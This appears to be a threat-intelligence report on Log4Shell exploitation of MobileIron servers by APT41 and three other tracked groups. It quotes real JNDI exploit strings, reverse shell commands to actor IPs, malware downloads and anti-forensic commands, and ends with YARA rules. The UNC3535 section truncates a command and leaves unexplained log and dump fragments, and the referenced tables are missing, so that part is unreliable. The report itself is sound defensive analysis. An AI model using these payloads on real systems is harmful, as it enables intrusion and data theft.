Forged in Fire: A Survey of MobileIron Log4Shell Exploitation

Written by: Geoff Ackerman, Tufail Ahmed, James Maclachlan, Dallin Warne, John Wolfram, Brandon Wilbur

On December 10, 2021, the Apache Software Foundation disclosed CVE-2021-44228, aka “Log4Shell”, a critical vulnerability in Apache’s Log4j version 2.14.1 and earlier that affects a large number of products that utilize this logging library.

Through our Consulting and Managed Defense clients, Mandiant observed four unique applications targeted and exploited using CVE-2021-44228. One product that caught our attention in the immediate aftermath of this CVE’s release was MobileIron Core; an on-premises mobile device management solution owned by Ivanti, who immediately responded to the vulnerability and proactively informed customers using the impacted products, recommending that they follow test mitigations within 24 hours. Proof-of-concept (PoC) code quickly became available to exploit the vulnerability in unpatched MobileIron systems and can be easily modified to target any organization using the product. As a result, we observed a few notable adversaries jump at the opportunity.

In this blog post, we will discuss the exploitation of MobileIron servers by four unique adversaries, providing insight into each group’s operations and capabilities. While the initial exploitation of a vulnerable MobileIron server appeared the same across intrusions, our methodical clustering and delineation of post-exploitation actions unveiled some familiar adversaries and unmasked some new players that made quick use of this newly published exploit.

CVE-2021-44228 Big Picture

First let’s take a step back and review Log4j targeting since CVE-2021-44228's release. Beginning the day of that initial disclosure, Mandiant observed mass scanning and exploitation attempts across a large variety of our customers. Financially motivated actors immediately jumped at the opportunity to deploy cryptominers such as XMRIG. In mass exploitation scenarios, like Log4Shell, we have found that cryptominers often drop first. While not immediate, Mandiant later observed ransomware actors exploit CVE-2021-44228 to gain their initial foothold into target environments. Groups that are widely suspected of being related to foreign intelligence entities, such as APT41, wasted no time in exploiting MobileIron servers as they were observed within a day of the announcement of the vulnerability.

The Actors

Since its initial disclosure, we have observed 22 distinct clusters of activity involved in the exploitation of CVE-2021-44228. These adversaries used a range of tools and techniques in support of varying mission objectives during the post-exploitation phase of their intrusions. Table 1 shows 12 of those clusters sorted by their assessed goals who have conducted Log4Shell-based campaigns against multiple organizations.

Through all the noise of Log4j scanning, cryptominers, security testing, and intrusion activity that occurred in December 2021, the following four threat groups exploited MobileIron to conduct the most significant intrusions observed by Mandiant.

Mandiant uses the label “UNC” group—or “uncategorized” group—to refer to a cluster of intrusion activity that includes observable artifacts such as adversary infrastructure, tools, and tradecraft that we are not yet ready to give a formal classification to, like APT or FIN (learn more about how Mandiant tracks uncategorized threat actors).

Further details surrounding each of the aforementioned groups are provided in Table 3:

Threat Group Details

MobileIron Impact

In this section we walk through the MobileIron-based intrusions conducted by each of the aforementioned adversaries.

APT41

In one of the most notable intrusions, APT41 made quick use of this public exploit to target organizations, which included multiple U.S. state government entities. APT41 used CVE-2021-44228 to target at least four organizations: a telecom company based in the APJ region that is a frequent target of Chinese espionage operations, one US-based financial organization, and two state level government agencies in the U.S.

APT41 leveraged CVE-2021-44228 against vulnerable MobileIron servers to launch reverse shell payloads back to their controlled server. Using this access, APT41 executed commands on the system under the context of the user account tomcat. One example reverse shell payload is presented in Figure 1.

TomcatBypass/Command/Base64/YmFzaCAtaT4mIC9kZXYvdGNwLzEwMy4yNDIuMTMzLjQ4LzgwODUgMD4mMQ==

The base64-encoded string decodes to the following reverse shell payload (Figure 2).

bash -i>& /dev/tcp/103.242.133[.]48/8085 0>&1

Mandiant also observed payloads consistent with verifying network connectivity to a threat actor-controlled host (Figure 3).

ping -c 1 libxqagv.ns.dns3[.]cf                                                       

nslookup libxqagv.ns.dns3[.]cf

Approximately one hour later, Mandiant identified further exploitation attempts using sub-domains of eu[.]org to test outbound network connectivity (Figure 4).

ldap:/198.13.40[.]130:1389/Basic/Dnslog/335b5282.dns.1433.eu[.]org
ldap://198.13.40[.]130:1389/Deserialization/URLDNS/335b5282.dns.1433.eu[.]org

After confirming outbound connectivity, APT41 used CVE-2021-44228 to execute a new reverse shell payload (Figure 5).

"s${jndi:ldap://198.13.40[.]130:1389/Deserialization/CommonsBeanutils1/ReverseShell/198.13.40[.]130/2222}"
"s${jndi:ldap://198.13.40[.]130:1389/Basic/ReverseShell/198.13.40[.]130/2222}"

Once APT41 established the reverse shell, they leveraged wget to download and stage their payload on the MobileIron server (Figure 6).

wget http://103.224.80[.]44:8080/kernel

Mandiant determined the kernel file was an ELF variant of KEYPLUG, tracked now as KEYPLUG.LINUX. The threat actor configured the sample to connect to the domain microsoftfile[.]com for command and control. At the time of the activity, the domain resolved to the IP address 103.224.80[.]44. APT41 also modified the permissions of the binary to give full read/write/execute permissions to all users (Figure 7).

chmod 777 kernel 

Finally, APT41 took a few steps to attempt to hide their activity. They renamed the KEYPLUG.LINUX binary to .kernel to hide the file with the hidden file attribute, then leveraged the nohup utility to ensure the process remains running and ignores hangups. APT41 also leveraged the & operator to execute the binary as a background process (Figure 8).

nohup ./.kernel & 

Mandiant Managed Defense’s swift detection and containment of this intrusion once again proved its worth against even the most advanced and prolific espionage actors. However, as noted in our recently released blog post on APT41’s latest campaigns, the group has remained undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020 and continues to operate at an ever-increasing tempo with a focus on vulnerable U.S. state and local government networks. Mandiant expects the group to continue to evolve and develop their own attack vectors while integrating existing capabilities into their toolkit.

UNC961

UNC961 is a suspected financially motivated threat group that Mandiant has tracked since 2018. They seized the opportunity to exploit CVE-2021-44228 by targeting organizations with publicly accessible MobileIron servers. UNC961 is notable for their seemingly exclusive use of exploits against web applications for initial access.

At one target, Mandiant observed UNC961 use their CVE-2021-44228 payload to establish a reverse shell. This payload was also crafted to unset the HISTFILE environment variable to thwart forensic analysis by preventing the command line history from being written to disk.

{"connectedCloudName":"","logType":"userAction","version":1,"loggedAt":163950
1069210,"actionAt":1639501069210,"device":null,"actor":null,"configuration":n
ull,"updatedBlob":null,"certificateDetails":null,"message":null,"spaceName":n
ull,"spacePath":null,"actionType":"USER_PORTAL_SIGN_IN","requestedAt":1639501
069210,"completedAt":1639501069210,"reason":"Sign In
Failed","status":"Failed","objectId":null,"objectType":null,"objectName":null
,"subjectId":null,"subjectType":"User Portal","subjectName":"User Portal -
10.240.191.26","subjectOwnerName":null,"requesterName":"${jnd${AvmMzY:qv:FCGW
U:XTWCd:-i}:${jnd${CSQNpd:dM:-i}${ARhXC:-:}ldap${rt:NeMA:bbLAHm:Cku:MMHDE:-
:}//107.181.187.184:389/TomcatBypass/Command/Base64/dW5zZXQgSElTVEZJTEU7IGJhc
2ggLWkgPiYgL2Rldi90Y3AvMTA3LjE4MS4xODcuMTg0LzQyNDIgMD4mMQ==}","updateRequestI
d":null,"userInRole":null,"parentId":null,"cookie":null}

Figure 10 shows the deobfuscated exploit string.

${jndi:ldap://107.181.187.184:389/TomcatBypass/Command/Base64/dW5zZXQgSElTVE
ZJTEU7IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTA3LjE4MS4xODcuMTg0LzQyNDIgMD4mMQ==}

The decoded command, shown in Figure 11, removed command-line logging and executed a reverse shell payload.

unset HISTFILE; bash -i >& /dev/tcp/107.181.187.184/4242 0>&1

UNC961 commonly employs this anti-forensic technique in their Linux-based intrusions, either as a component of an exploit payload such as here with Log4Shell, or during the hands-on-keyboard post-exploitation phase. Following their initial foothold, they performed host-based reconnaissance, and the following day deployed their HOLEPUNCH tunneler. HOLEPUNCH is a Windows and UNIX source-compatible utility that uses SOCKS5 style commands to multiplex connections back to its command and control (C2) server.

It is worth noting that, in addition to targeting MobileIron servers, UNC961 also exploited a VMWare Horizon Server belonging to a separate victim during their Log4Shell campaign. Following the Horizon Server’s exploitation, UNC961 deployed two previously unobserved backdoors: HOLEDOOR and DARKDOOR. HOLEDOOR is written in C, whereas DARKDOOR is written in Go. UNC961 used these backdoors to conduct reconnaissance in the victim environment and steal credentials for users who had previously logged in to the VMware Horizon server. Additionally, UNC961 exported the contents of the SAM, SECURITY, and SYSTEM registry hives using the built-in Windows tool reg.exe. UNC961 then exfiltrated the exported registry data to their infrastructure using the PSCP utility.

UNC3500

One day after the initial Apache announcement, UNC3500 jumped at the opportunity to target an educational institution in North America. Having successfully weaponized the Log4Shell exploit, UNC3500 launched a reverse shell on a MobileIron server. After performing some initial host reconnaissance, the adversary achieved persistence through a relatively unique method. Using the built-in curl command, UNC3500 downloaded three files, modified permissions of one, and launched another as a new process (Figure 12).

curl hxxp://35.189.145[.]119/hamcore.se2 > /mi/pki/mics/log/hamcore.se2
curl hxxp://35.189.145[.]119/https > /mi/pki/mics/log/https
curl hxxp://35.189.145[.]119/vpn_bridge.config > /mi/pki/mics/log/vpn_bridge.config
chmod a+x /mi/pki/mics/log/https
/mi/pki/mics/log/https start

The file's https (MD5: 00352d167c44272dba415c36867a8125) and hamcore.se2 (MD5: 9fb1191ba0064d317a883677ce568023) are components of SoftEther’s VPN server bridge, PacketiX. The PacketiX VPN Bridge creates a layer 2 connection between a physical network adapter on a local system and a remote SoftEther VPN server. It requires an accompanying library file hamcore.se2 and a configuration file vpn_bridge.config. By deploying this package, UNC3500 established persistence on the compromised MobileIron server.

UNC3500 appeared to have some difficulty initially establishing their VPN. They downloaded their vpn_bridge.config file not once but four times, each with minor changes. Table 4 shows the three uniquely configured C2 servers from these files.

UNC3500 had to troubleshoot their connection issues by examining VPN log files and running ping, route, and curl commands (Figure 13).

curl http://35.189.145.119/vpn_bridge.config > /mi/pki/mics/log/vpn_bridge.config
/mi/pki/mics/log/https start
ls /mi/pki/mics/log/
ls /mi/pki/mics/log/server_log
cat /mi/pki/mics/log/server_log/vpn_20211210.log
/mi/pki/mics/log/https stop
ping -c 2 8.8.8[.]8
route
curl http://45.76.98[.]184:33221
curl http://34.92.40[.]189:33221
curl http://34.92.40[.]189:443
curl http://34.92.40[.]189:443
ls

UNC3500 used the final configuration file to establish a VPN connection with a SoftEther server hosted on 45.76.98[.]184 over port 443 using a unique certificate and key combination. UNC3500 proceeded to hide their tracks by clearing the bash history using the command history –c.

Analysis of these config files identified overlaps with a prior intrusion where this group targeted an organization in the telecommunications vertical. During these prior on-host intrusions, Mandiant observed UNC3500 engage in reconnaissance activities primarily using Windows built-in commands or PSEXEC, perform credential harvesting using MODKATZ, and deploy BEHINDER and CHOPPER web shells.

UNC3535

Finally, Mandiant clustered another unique set of MobileIron exploitation activity as UNC3535. Mandiant observed UNC3535 use CVE-2021-44228 to deploy a reverse shell and use their access to harvest and exfiltrate sensitive MobileIron data.

As typical with other Log4Shell exploits, the adversary used a base64-encoded string (Figure 14).

${jndi:ldap://187.109.15[.]2:9126/TomcatBypass/Command/Base64/ YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTg3LjEwOS4xNS4yLzQ0MyAwPiYx}

The base64-encoded string in Figure 14 decodes to Figure 15.

bash -i >& /dev/tcp/187.109.15[.]2/443 0>

GET /mifs/images/wtower_in.png HTTP/1.1" 154515764 "-" "Wget/1.20.3 (linux-gnu)

-- MySQL dump 10.13  Distrib 5.7.31, for Linux (x86_64)
--
-- Host: localhost    Database:
-- ------------------------------------------------------
-- Server version 5.7...NOTES=0 */;
--
-- Current Database: `mifs`

SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2021-12-16 17:36:23

rule APT_Backdoor_KEYPLUG_MultiXOR_Config
{
    meta:
        author = "Mandiant"
        description = "Matches KEYPLUG XOR-encoded configurations. Locates multiple values of: TCP://, UDP://, WSS://, +http and their pipe-delimited variant: |TCP://, |UDP://, |WSS://, |+http. Requires at least one instance of 00| in the encoded configuration which corresponds to the sleep value. Removed instances where double-NULLs were present in the generated strings to reduce false positives."
    strings:
        // TCP
        $tcp1   = "TCP://"  xor(0x01-0x2E)
        $tcp2   = "TCP://"  xor(0x30-0xFF)
        $ptcp1 = "|TCP://" xor(0x01-0x2E)
        $ptcp2 = "|TCP://" xor(0x30-0xFF)
        // UDP
        $udp1   = "UDP://"  xor(0x01-0x2E)
        $udp2   = "UDP://"  xor(0x30-0xFF)
        $pudp1 = "|UDP://" xor(0x01-0x2E)
        $pudp2 = "|UDP://" xor(0x30-0xFF)
        // WSS
        $wss1   = "WSS://"  xor(0x01-0x2E)
        $wss2   = "WSS://"  xor(0x30-0x52)
        $wss3   = "WSS://"  xor(0x54-0xFF)
        $pwss1 = "|WSS://" xor(0x01-0x2E)
        $pwss2 = "|WSS://" xor(0x30-0x52)
        $pwss 3 = "|WSS://" xor(0x54-0xFF)
        // HTTP
        $http1 = "+http"   xor(0x01-0x73)
        $http2 = "+http"   xor(0x75-0xFF)
        $phttp1 = "|+http"  xor(0x01-0x73)
        $phttp2 = "|+http"  xor(0x75-0xFF)
        // Sleep value
        $zeros1 = "00|"     xor(0x01-0x2F)
        $zeros2 = "00|"     xor(0x31-0xFF)
    condition:
        filesize < 10MB and
        (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)) and
        for any of ($tcp*,$udp*,$wss*,$http*): (# == 2 and @[2] - @[1] < 200) and
        for any of ($ptcp*,$pudp*,$pwss*,$phttp*): (# == 1) and
        any of ($zeros*)
}

import "pe"
rule APT_Tunneler_Linux_HOLEPUNCH_1
{
    meta:
        author = Mandiant
    strings:
        $sb1 = { 83 [2] 00 [2-16] 83 [2] 00 [2-16] E8 [4-5] 89 45 [1-2] 83 [2] 00 [4-32] E8 [4] 80 [2] 00 [2-8] C7 45 ?? 00 00 00 00 [0-32] 8B [2-3] 8B [2-3] 01 [1-8] 8B [2-3] 8B [2-3] 01 [1-8] 83 [2-8] 88 [1-2] 83 [2] 01 }
        $sb2 = { 89 [2] 8B [2-3] 89 [1-16] ( E8 | FF ) [4-64] ( E8 | FF ) [4-32] 3C 01 7? [4-80] 0A 00 00 00 [4-64] 0F B6 [2] 3C 02 }
    condition:
        (uint32(0) == 0x464c457f) and all of them
}

import "pe"
rule APT_Tunneler_Linux_HOLEPUNCH_2
{
    meta:
        author = Mandiant
    strings:
        $n1 = "\x00Can`t create new process\x00"
        $ss1 = "process_data_from_tunnel" fullword
        $ss2 = "chunk_put" fullword
        $ss3 = "update_tunnel_descriptors" fullword
        $ss4 = "SendToTunnel" fullword
        $ss5 = "SendToTunnelSocks5Answer" fullword
        $ss6 = "socks5_process_data" fullword
    condition:
        (uint32(0) == 0x464c457f) and (all of ($s*)) and not $n1
}